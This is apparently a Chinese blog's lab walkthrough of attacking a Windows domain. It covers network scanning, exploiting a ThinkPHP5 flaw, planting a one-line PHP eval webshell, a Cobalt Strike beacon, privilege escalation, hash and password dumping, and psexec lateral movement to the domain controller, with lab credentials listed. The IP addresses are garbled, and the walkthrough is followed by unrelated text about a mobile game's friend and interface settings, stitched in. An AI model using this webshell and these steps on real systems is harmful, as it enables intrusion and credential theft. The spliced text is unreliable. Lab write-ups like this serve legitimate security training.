kali攻击机:
ip为1921681128
靶机win7:
本地管理员用户leo\123com
域管sun\Administrator dc123com 改为 20121225Qnmxa@
ip为1921681136和192168138138
靶机win2008:
账号sun\admin 2020com改为20121225Qnmxa@
ip为192168138138
在win7上打开phpstudy,打开web环境
复现
使用arp-scan -l扫描内网存活主机
找到目标靶机为1921681136
使用nmap进行扫描
nmap 1921681136 -T4 -A -sV
发现了80端口,先访问下
发现为TP5,直接用工具打
可以执行命令,直接写入一句话木马
echo <php @eval($_POST['cmd'])> > shellphp
直接用蚁剑连接,然后对目标进行信息搜集
发现有两个网段,一个是1段,另一个是138段,并且在域suncom中,DNS服务器为192168138138,基本上DNS服务器就是域控
话不多说,直接上CS,直接通过powershell命令上线
设置心跳时间为1秒:sleep 1
然后使用插件直接一键提权,比如梼杌、谢公子插件等,拿到一个system权限的会话
打开system权限的会话,查看防火墙情况
shell netsh firewall show state
是关着的,我手动把它关了
查看域内计算机列表:net view
返现主机DC和WIN7
查看域控列表:net dclist
查看本机用户列表
有3个用户
接下来抓hash:hashdump
抓密码:logonpassword
然后通过“视图”-“密码凭证”查看抓到的密码
点击“视图”-“目标列表”
直接使用psexec配合SMB监听器上线DC机器
拿到了DC的beacon
在游戏里面的设置那里有,也有拒绝加好友设置的。
游戏主界面,左上角的聊天横窗口,点进去,里面有个图标小齿轮,设置,拒绝陌生人邀请。
角色界面说明
主界面最显眼的位置是玩家当前的游戏角色,占据画面的大部分,其次是位于角色右侧的模式选择栏,玩家可以通过上下滑动 选择不同的游戏模式。游戏系统入口被放置在了画面的左侧边栏位置,包括仓库、任务、训练等选项。
左下角是玩家的个人信 息与交互系统,在这里可以添加好友、收发邮件等,完成与好友的社交互动。右下角是活动、商城、靶场等特定的功能或场景 右上角则是玩家的货币及设置按钮。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)